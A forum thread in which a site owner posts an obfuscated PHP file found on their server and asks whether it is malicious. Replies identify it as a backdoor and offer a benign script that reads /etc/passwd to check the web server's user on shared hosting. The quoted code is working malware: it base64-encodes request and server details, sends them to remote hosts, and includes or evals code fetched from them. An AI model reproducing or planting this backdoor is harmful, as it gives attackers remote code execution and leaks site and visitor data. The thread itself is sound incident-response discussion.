I found this strange file. Does this look suspicious to anyone?? (it does to me!). Thanks to anyone who can advise.
<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j); if ((include(base64_decode("aHR0cDovLw==").base64_decode("YS5yc2RjcmFmdC53cw==")."/?".$str))); else if (include(base64_decode("aHR0cDovLw==").base64_decode("YWQucnVud2ViLmluZm8=")."/?".$str)); else eval(file_get_contents(base64_decode("aHR0cDovLzcueG1sZGF0YS5pbmZvLz8=").$str)); ?>
HELP I've been hacked!
Moderator: General Moderators
Re: HELP I've been hacked!
Yep, a backdoor.
You should be more concerned about how it got there (although at least one of the related hosts appears to be online).
You should be more concerned about how it got there (although at least one of the related hosts appears to be online).
- Chris Corbyn
- Breakbeat Nuttzer
- Posts: 13098
- Joined: Wed Mar 24, 2004 7:57 am
- Location: Melbourne, Australia
Re: HELP I've been hacked!
Are you on a shared hosting plan? What host are you with?
Run this script and see if you get a generic username output:
That script isn't dangerous. It tries to look up the username of the UID apache is running under. If the server is a windows server, or a *nix variant which doesn't use /etc/passwd then it won't work.
If the user is anything like "apache", "http", "nobody", "www" etc then it's highly probably all the other users on that server have free and easy access to your files.
Run this script and see if you get a generic username output:
Code: Select all
<?php
$uid = getmyuid();
if (is_file('/etc/passwd')) {
$lines = file('/etc/passwd');
foreach ($lines as $line) {
if (preg_match('/:' . preg_quote($uid) . ':/', $line)) {
$data = explode(':', $line);
printf("Server is using user '%s'", array_shift($data));
break;
}
}
} else {
printf("Unable to determine username");
}If the user is anything like "apache", "http", "nobody", "www" etc then it's highly probably all the other users on that server have free and easy access to your files.